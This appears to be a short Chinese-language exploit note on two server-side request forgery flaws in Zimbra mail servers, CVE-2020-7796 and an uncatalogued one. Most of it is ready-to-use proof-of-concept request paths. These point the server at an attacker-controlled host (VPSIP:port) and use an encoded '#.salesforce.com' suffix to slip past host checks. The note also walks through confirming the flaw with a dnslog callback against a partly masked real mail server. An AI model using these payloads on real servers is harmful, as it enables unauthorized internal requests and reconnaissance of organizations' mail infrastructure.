1.CVE-2020-7796

该SSRF漏洞出现的脚本位于/zimlet/com_zimbra_webex/httpPost.jsp,不是所有的zimbra邮件服务器都开启了zimlet,因此CVE-2020-7796并不是通用的,POC代码如下:

  1. /zimlet/com_zimbra_webex/httpPost.jsp?companyId=VPSIP:port#

2.SSRF漏洞2(无CVE编号)

POC代码如下:

  1. /service/error/sfdc_preauth.jsp?session=s&userid=1&server=vpsip:port%23.salesforce.com/

验证:
https://xxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/
使用dnslog作为验证SSRF,dnslog地址zmftc4.dnslog.cn
访问该链接:
https://xxxxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/
image.png
再查看dnslog
image.png
12x.xxx.xxx.24为mail.xxxx.com的ip地址,由该IP发起的请求,说明存在SSRF漏洞